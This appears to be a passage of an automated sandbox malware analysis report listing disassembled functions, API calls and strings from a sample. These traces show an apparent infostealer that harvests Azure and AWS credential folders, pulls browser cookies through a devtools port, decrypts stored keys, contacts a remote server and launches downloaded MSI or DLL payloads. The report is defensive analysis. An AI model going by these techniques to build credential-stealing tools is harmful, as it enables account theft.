                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                        • String ID:
                                        • API String ID: 3744635739-3916222277
                                        • Opcode ID: 51682b807eee72199b4968c65bc350c0ff7801a122bd6d51733c6f5719be6b21
                                        • Instruction ID: 9509e538a72e758837b3cf97be02593a62562a426afa59b1b5583bbf77883da4
                                        • Opcode Fuzzy Hash: 51682b807eee72199b4968c65bc350c0ff7801a122bd6d51733c6f5719be6b21
                                        • Instruction Fuzzy Hash: 40E12D71900118ABCB14EBA4ECA2FEEB7B9BF14300F0855A9F10677191EF356A49CB61
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                        • RegOpenKeyExA.ADVAPI32(00000000,01A8B8C0,00000000,00020019,00000000,00E305BE), ref: 00E28534
                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00E285B6
                                        • wsprintfA.USER32 ref: 00E285E9
                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00E2860B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00E2861C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00E28629
                                          • Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                                        • String ID: - $%s\%s$?
                                        • API String ID: 3246050789-3278919252
                                        • Opcode ID: 1171867759ab89ade8fb7c755c7fa5c9c7194ff520f7ab7c6ea4a9a29ee5e94d
                                        • Instruction ID: 2ffef9a5ff27d15fdfcde931bb0eed231ed1230d683cb509dda854d4c3bded9d
                                        • Opcode Fuzzy Hash: 1171867759ab89ade8fb7c755c7fa5c9c7194ff520f7ab7c6ea4a9a29ee5e94d
                                        • Instruction Fuzzy Hash: 2E814D71911228ABDB24DB54DD95FEAB7B8BF08700F1486D8F10AB6140DF356B84CFA0
                                        APIs
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00E291FC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateGlobalStream
                                        • String ID: `d$`d$image/jpeg
                                        • API String ID: 2244384528-3402243820
                                        • Opcode ID: 75a2c062804eda6022ab88d66a88a527b98bca98fe7f725cffddc4c8eed43a3a
                                        • Instruction ID: 05046da780f2df1c6af0f39bea6ca81dae0e2eb2fa2019032268b48eefb3a7fe
                                        • Opcode Fuzzy Hash: 75a2c062804eda6022ab88d66a88a527b98bca98fe7f725cffddc4c8eed43a3a
                                        • Instruction Fuzzy Hash: F4711071900218EBDB14DFE5E885FEEB7B9BF48700F109548F656AB284DB35E944CB60
                                        APIs
                                          • Part of subcall function 00E28F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E28F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E25000
                                        • lstrcat.KERNEL32(?,\.azure\), ref: 00E2501D
                                          • Part of subcall function 00E24B60: wsprintfA.USER32 ref: 00E24B7C
                                          • Part of subcall function 00E24B60: FindFirstFileA.KERNEL32(?,?), ref: 00E24B93
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E2508C
                                        • lstrcat.KERNEL32(?,\.aws\), ref: 00E250A9
                                          • Part of subcall function 00E24B60: StrCmpCA.SHLWAPI(?,00E30FC4), ref: 00E24BC1
                                          • Part of subcall function 00E24B60: StrCmpCA.SHLWAPI(?,00E30FC8), ref: 00E24BD7
                                          • Part of subcall function 00E24B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00E24DCD
                                          • Part of subcall function 00E24B60: FindClose.KERNEL32(000000FF), ref: 00E24DE2
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E25118
                                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00E25135
                                          • Part of subcall function 00E24B60: wsprintfA.USER32 ref: 00E24C00
                                          • Part of subcall function 00E24B60: StrCmpCA.SHLWAPI(?,00E308D3), ref: 00E24C15
                                          • Part of subcall function 00E24B60: wsprintfA.USER32 ref: 00E24C32
                                          • Part of subcall function 00E24B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00E24C6E
                                          • Part of subcall function 00E24B60: lstrcat.KERNEL32(?,01A8F1D8), ref: 00E24C9A
                                          • Part of subcall function 00E24B60: lstrcat.KERNEL32(?,00E30FE0), ref: 00E24CAC
                                          • Part of subcall function 00E24B60: lstrcat.KERNEL32(?,?), ref: 00E24CC0
                                          • Part of subcall function 00E24B60: lstrcat.KERNEL32(?,00E30FE4), ref: 00E24CD2
                                          • Part of subcall function 00E24B60: lstrcat.KERNEL32(?,?), ref: 00E24CE6
                                          • Part of subcall function 00E24B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00E24CFC
                                          • Part of subcall function 00E24B60: DeleteFileA.KERNEL32(?), ref: 00E24D81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                        • API String ID: 949356159-974132213
                                        • Opcode ID: 3c33fb6355eada75e15fc3af9b3453d91e12351e25553bb4ec7f37791cae2232
                                        • Instruction ID: 03d6a077507c726f7f4fdb42519b30857c286814bd4f54e69b16e7348c34f2cd
                                        • Opcode Fuzzy Hash: 3c33fb6355eada75e15fc3af9b3453d91e12351e25553bb4ec7f37791cae2232
                                        • Instruction Fuzzy Hash: 2C41D6BAA4031867DB24E760ED5BFED37685B50700F001498B689760C1EEB56BC8CB92
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00E23415
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00E235AD
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00E2373A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExecuteShell$lstrcpy
                                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                        • API String ID: 2507796910-3625054190
                                        • Opcode ID: 6ac1093450bc7c74201788577db4549bcbe3cb2909fa5bde860c90c056cc1d9c
                                        • Instruction ID: 1871503af8ba9184227012bd485b55766135ffdf3db5ab13630afc6fe7099632
                                        • Opcode Fuzzy Hash: 6ac1093450bc7c74201788577db4549bcbe3cb2909fa5bde860c90c056cc1d9c
                                        • Instruction Fuzzy Hash: 10120E719101289BCB14EBA0EDA2FEEB7B9AF14300F4855A9F50776191EF342B49CF61
                                        APIs
                                          • Part of subcall function 00E19A50: InternetOpenA.WININET(00E30AF6,00000001,00000000,00000000,00000000), ref: 00E19A6A
                                        • lstrcat.KERNEL32(?,cookies), ref: 00E19CAF
                                        • lstrcat.KERNEL32(?,00E312C4), ref: 00E19CC1
                                        • lstrcat.KERNEL32(?,?), ref: 00E19CD5
                                        • lstrcat.KERNEL32(?,00E312C8), ref: 00E19CE7
                                        • lstrcat.KERNEL32(?,?), ref: 00E19CFB
                                        • lstrcat.KERNEL32(?,.txt), ref: 00E19D0D
                                        • lstrlen.KERNEL32(00000000), ref: 00E19D17
                                        • lstrlen.KERNEL32(00000000), ref: 00E19D26
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                        • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                        • API String ID: 3174675846-3542011879
                                        • Opcode ID: 8bcced13945f3c2ad2bfa0d94b55c91163f60472276479fe3b57baef9b3e2fd8
                                        • Instruction ID: 52835e15ed5749514f18d0697d4af0d99c6c413f6d6caee561800fa5514db105
                                        • Opcode Fuzzy Hash: 8bcced13945f3c2ad2bfa0d94b55c91163f60472276479fe3b57baef9b3e2fd8
                                        • Instruction Fuzzy Hash: DF5173719006089BDB14EBE4DC5AFEE7778AF04701F406598F10AB7095EF356A88CF61
                                        APIs
                                          • Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6
                                          • Part of subcall function 00E162D0: InternetOpenA.WININET(00E30DFF,00000001,00000000,00000000,00000000), ref: 00E16331
                                          • Part of subcall function 00E162D0: StrCmpCA.SHLWAPI(?,01A8F1A8), ref: 00E16353
                                          • Part of subcall function 00E162D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E16385
                                          • Part of subcall function 00E162D0: HttpOpenRequestA.WININET(00000000,GET,?,01A8EB30,00000000,00000000,00400100,00000000), ref: 00E163D5
                                          • Part of subcall function 00E162D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E1640F
                                          • Part of subcall function 00E162D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E16421
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E25568
                                        • lstrlen.KERNEL32(00000000), ref: 00E2557F
                                          • Part of subcall function 00E28FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E28FE2
                                        • StrStrA.SHLWAPI(00000000,00000000), ref: 00E255B4
                                        • lstrlen.KERNEL32(00000000), ref: 00E255D3
                                        • lstrlen.KERNEL32(00000000), ref: 00E255FE
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 3240024479-1526165396
                                        • Opcode ID: 4b9a0c0af7a9a5a975e17f3819cc9b0811b0dfcfe57de7af3b72a235053abe80
                                        • Instruction ID: 09524bb1de6c5f890332e0d203fec9e85253fab7873f0a4c6fe63b54114cb94c
                                        • Opcode Fuzzy Hash: 4b9a0c0af7a9a5a975e17f3819cc9b0811b0dfcfe57de7af3b72a235053abe80
                                        • Instruction Fuzzy Hash: 97510E709101189BCB18FF64EDA6BED77B9AF10340F586468F9067B592EF306B44CB62
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen
                                        • String ID:
                                        • API String ID: 2001356338-0
                                        • Opcode ID: bb943c3f81f6599dd4301bb8711be14cfe6e856966e4205673b82df79aa774f0
                                        • Instruction ID: fd56222fd1c2cb2c99212282ed8cf5d1a35b6aa16de8168304e57059b12e8418
                                        • Opcode Fuzzy Hash: bb943c3f81f6599dd4301bb8711be14cfe6e856966e4205673b82df79aa774f0
                                        • Instruction Fuzzy Hash: 13C194B59001299BCB14EF60EC9AFDE73B9BF64304F0455D8F409B7242DA75AA84CF91
                                        APIs
                                          • Part of subcall function 00E28F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E28F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E2453C
                                        • lstrcat.KERNEL32(?,01A8EEA8), ref: 00E2455B
                                        • lstrcat.KERNEL32(?,?), ref: 00E2456F
                                        • lstrcat.KERNEL32(?,01A8D690), ref: 00E24583
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E28F20: GetFileAttributesA.KERNEL32(00000000,?,00E11B94,?,?,00E3577C,?,?,00E30E22), ref: 00E28F2F
                                          • Part of subcall function 00E1A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E1A489
                                          • Part of subcall function 00E1A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E1A13C
                                          • Part of subcall function 00E1A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E1A161
                                          • Part of subcall function 00E1A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E1A181
                                          • Part of subcall function 00E1A110: ReadFile.KERNEL32(000000FF,?,00000000,00E1148F,00000000), ref: 00E1A1AA
                                          • Part of subcall function 00E1A110: LocalFree.KERNEL32(00E1148F), ref: 00E1A1E0
                                          • Part of subcall function 00E1A110: CloseHandle.KERNEL32(000000FF), ref: 00E1A1EA
                                          • Part of subcall function 00E29550: GlobalAlloc.KERNEL32(00000000,-F,00E2462D), ref: 00E29563
                                        • StrStrA.SHLWAPI(?,01A8EF68), ref: 00E24643
                                        • GlobalFree.KERNEL32(?), ref: 00E24762
                                          • Part of subcall function 00E1A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E1A23F
                                          • Part of subcall function 00E1A210: LocalAlloc.KERNEL32(00000040,?,?,?,00E14F3E,00000000,?), ref: 00E1A251
                                          • Part of subcall function 00E1A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E1A27A
                                          • Part of subcall function 00E1A210: LocalFree.KERNEL32(?,?,?,?,00E14F3E,00000000,?), ref: 00E1A28F
                                        • lstrcat.KERNEL32(?,00000000), ref: 00E246F3
                                        • StrCmpCA.SHLWAPI(?,00E308D2), ref: 00E24710
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00E24722
                                        • lstrcat.KERNEL32(00000000,?), ref: 00E24735
                                        • lstrcat.KERNEL32(00000000,00E30FA0), ref: 00E24744
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
